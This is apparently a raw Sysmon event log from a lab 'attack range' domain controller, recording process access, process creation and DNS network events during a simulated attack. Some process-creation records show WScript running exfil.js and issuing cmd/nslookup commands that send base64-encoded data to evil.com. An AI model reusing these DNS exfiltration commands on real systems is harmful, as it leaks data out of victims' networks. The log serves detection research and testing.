14:21:55.408{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216840Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.408{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216839Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.408{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216838Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.407{2E1864BB-18E0-629A-6742-000000005F02}39763656C:\Windows\System32\WScript.exe{2E1864BB-1903-629A-CC46-000000005F02}2704C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216837Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.406{2E1864BB-1903-629A-CC46-000000005F02}2704C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqlks.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 10341000x8000000000000000216836Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.388{2E1864BB-E13C-6299-0B00-000000005F02}6363188C:\Windows\system32\lsass.exe{2E1864BB-18E2-629A-6E42-000000005F02}7308C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216835Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.388{2E1864BB-E13C-6299-0B00-000000005F02}6363188C:\Windows\system32\lsass.exe{2E1864BB-18E2-629A-6E42-000000005F02}7308C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000216834Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.373{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlnat.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216833Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.326{2E1864BB-1903-629A-CA46-000000005F02}28007400C:\Windows\system32\conhost.exe{2E1864BB-1903-629A-CB46-000000005F02}2328C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216832Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.326{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1903-629A-CB46-000000005F02}2328C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216831Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.326{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216830Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.326{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216829Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.326{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216828Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.326{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216827Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.326{2E1864BB-1903-629A-C946-000000005F02}29527848C:\Windows\system32\cmd.exe{2E1864BB-1903-629A-CB46-000000005F02}2328C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216826Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.325{2E1864BB-1903-629A-CB46-000000005F02}2328C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1903-629A-C946-000000005F02}2952C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnat.tmp 2>&1 354300x8000000000000000216825Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.890{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51434- 354300x8000000000000000216824Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.890{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51434- 354300x8000000000000000216823Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.889{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51433- 354300x8000000000000000216822Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.889{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51433- 354300x8000000000000000216821Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.889{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51432- 354300x8000000000000000216820Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.888{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51432- 354300x8000000000000000216819Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.796{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51431- 354300x8000000000000000216818Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.796{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51431- 354300x8000000000000000216817Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.796{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51430- 354300x8000000000000000216816Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.796{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51430- 354300x8000000000000000216815Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.795{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51429- 354300x8000000000000000216814Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.795{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51429- 354300x8000000000000000216813Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.682{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51428- 354300x8000000000000000216812Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.682{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51428- 354300x8000000000000000216811Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.681{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51427- 354300x8000000000000000216810Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.681{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51427- 354300x8000000000000000216809Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.681{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51426- 354300x8000000000000000216808Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.681{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51426- 354300x8000000000000000216807Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.601{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51425- 354300x8000000000000000216806Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.601{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51425- 354300x8000000000000000216805Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.600{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51424- 354300x8000000000000000216804Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.600{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51424- 354300x8000000000000000216803Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.599{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51423- 354300x8000000000000000216802Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.599{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51423- 354300x8000000000000000216801Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.457{00000000-0000-0000-0000-000000000000}7608<unknown process>-udpfalsefalse127.0.0.1-51422-false127.0.0.1-53domain 354300x8000000000000000216800Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.457{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51422- 354300x8000000000000000216799Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.457{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51422- 354300x8000000000000000216798Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.457{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51421- 354300x8000000000000000216797Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.457{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51421- 354300x8000000000000000216796Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.456{00000000-0000-0000-0000-000000000000}7608<unknown process>-udpfalsefalse127.0.0.1-51420-false127.0.0.1-53domain 354300x8000000000000000216795Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.456{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51420- 354300x8000000000000000216794Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.456{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51420- 354300x8000000000000000216793Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.358{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51419- 354300x8000000000000000216792Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.358{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51419- 354300x8000000000000000216791Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.357{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51418- 354300x8000000000000000216790Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.357{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51418- 354300x8000000000000000216789Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.357{00000000-0000-0000-0000-000000000000}7548<unknown process>-udpfalsefalse127.0.0.1-51417-false127.0.0.1-53domain 354300x8000000000000000216788Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.357{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51417- 354300x8000000000000000216787Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.357{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51417- 354300x8000000000000000216786Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.277{00000000-0000-0000-0000-000000000000}644<unknown process>-udpfalsefalse127.0.0.1-51416-false127.0.0.1-53domain 354300x8000000000000000216785Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.277{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51416- 354300x8000000000000000216784Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.277{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT 